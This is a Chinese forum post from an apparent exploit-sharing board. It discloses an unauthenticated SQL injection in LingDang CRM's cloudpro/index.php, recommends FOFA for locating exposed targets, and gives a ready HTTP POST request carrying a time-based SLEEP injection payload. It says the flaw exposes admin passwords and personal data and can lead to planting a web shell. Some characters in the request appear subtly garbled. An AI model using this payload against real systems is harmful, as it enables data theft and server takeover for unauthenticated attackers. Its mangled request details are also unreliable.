设为首页收藏本站
切换到宽版

吾要学习网

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
吾要学习网»论坛 渗透测试 0day/nday分享区 灵当CRM cloudpro index.php sql注入漏洞
返回列表 发新帖
查看: 244|回复: 0

灵当CRM cloudpro index.php sql注入漏洞

[复制链接]
admin
  • TA的每日心情
    无聊
    昨天 09:04

    • 签到天数: 17 天

    [LV.4]偶尔看看III

    347

    主题

    348

    帖子

    2157

    积分

    管理员

    Rank: 9Rank: 9Rank: 9

    积分
    2157
    发表于 2025-9-12 15:40:14 | 显示全部楼层 |阅读模式
    [color=var(--weui-LINK)]灵当CRM[color=rgba(0, 0, 0, 0.9)] cloudpro/index.php 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

    [color=rgba(0, 0, 0, 0.9)]

    [color=rgba(0, 0, 0, 0.9)]资产确定:FOFA
    游客,如果您要查看本帖隐藏内容请回复



    P0ST /crm/weixinApp/cloudpro/index.php HTTP/1.1
    Host:
    User-Agent: .Mozi11a/5.8.(Knoppix; -Linux*x86_64)-AppleWebKit/537.36. (KHTML, like-Gecko)-Chrome/125.0.0.0-Safari/537.3600neCti00::01058
    Content-type:application/x-www-form-urlencoded
    Accept-Encoding:"gzip

    action=getMyAccount&usid=1 AND(SELECT 1-FROM(SELECT SLEEP(3))a)--q&my_cloudid-0

    回复

    使用道具 举报

    返回列表 发新帖
    高级模式
    B Color Image Link Quote Code Smilies
    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    QQ|小黑屋|吾要学习网 ( 陕ICP备2025065860号-1 )|网站地图|陕公网安备61010302001313号

    GMT+8, 2025-10-11 06:11 , Processed in 0.077892 second(s), 25 queries .

    Powered by 吾要学习

    Copyright © 2001-2025, wuyaoxuexi.cn.

    快速回复 返回顶部 返回列表